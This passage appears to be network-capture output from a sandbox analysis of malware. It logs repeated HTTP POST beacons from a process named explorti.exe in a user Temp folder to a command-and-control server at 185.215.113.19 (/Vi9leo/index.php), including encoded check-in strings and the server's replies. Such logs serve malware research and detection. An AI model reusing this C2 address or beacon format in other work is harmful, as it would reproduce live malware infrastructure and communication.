Sep 1, 2024 06:29:50.457571030 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:51.201062918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
105	192.168.2.5	49860	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:51.323873043 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:52.075524092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
106	192.168.2.5	49861	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:52.086292982 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:52.832056999 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
107	192.168.2.5	49862	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:52.960411072 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:53.700422049 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
108	192.168.2.5	49863	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:53.719053984 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:54.486517906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
109	192.168.2.5	49864	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:54.601501942 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:55.345346928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
110	192.168.2.5	49865	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:55.360733032 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:56.126555920 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
111	192.168.2.5	49866	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:56.258936882 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:57.004051924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
112	192.168.2.5	49867	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:57.016542912 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:57.789015055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.5	49868	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:57.913204908 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:29:58.672049046 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.5	49869	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:58.680550098 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:29:59.452893019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:29:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.5	49870	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:29:59.571737051 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:00.346474886 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.5	49871	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:00.355526924 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:01.131984949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.5	49872	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:01.256181002 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:01.999320030 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.5	49873	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:02.008835077 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:03.043190956 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Sep 1, 2024 06:30:03.045424938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.5	49874	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:03.162174940 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:03.902776957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.5	49875	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:03.915111065 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:04.879638910 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.5	49876	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:04.989132881 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:05.756460905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.5	49877	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:05.767600060 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:06.541378021 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.5	49878	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:06.667370081 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:07.418010950 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.5	49879	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:07.426306963 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 42 32 41 37 39 42 34 35 31 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7BBB2A79B45182D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Sep 1, 2024 06:30:08.185991049 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.5	49881	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Sep 1, 2024 06:30:08.306642056 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 1, 2024 06:30:09.435884953 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 1, 2024 06:30:09.435904026 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 01 Sep 2024 04:30:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.5	49882	185.215.113.19	80	6488	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
